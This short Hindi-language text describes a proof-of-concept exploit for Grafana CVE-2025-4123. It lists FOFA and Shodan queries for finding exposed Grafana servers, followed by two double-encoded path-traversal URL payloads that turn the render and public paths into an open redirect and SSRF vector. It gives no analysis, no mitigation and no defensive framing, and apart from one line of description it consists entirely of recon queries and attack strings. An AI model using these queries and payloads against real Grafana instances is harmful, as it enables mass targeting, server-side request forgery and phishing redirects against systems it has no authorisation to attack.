
Grafana CVE-2025-4123 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्राफ्टेड URL पथों के माध्यम से SSRF और ओपन रीडायरेक्ट हमलों को सक्षम बनाता है। इसमें Shodan और FOFA के लिए टोही क्वेरी शामिल हैं।
FOFA app="Grafana"
Shodan product:"Grafana (Open Source)"
http://localhost:3000/render/public/..%252f%255C{{OpenRedirectURL}}%252f%253F%252f..%252f..
/public/..%2F%5c{website.com}%2F%3f%2F..%2F..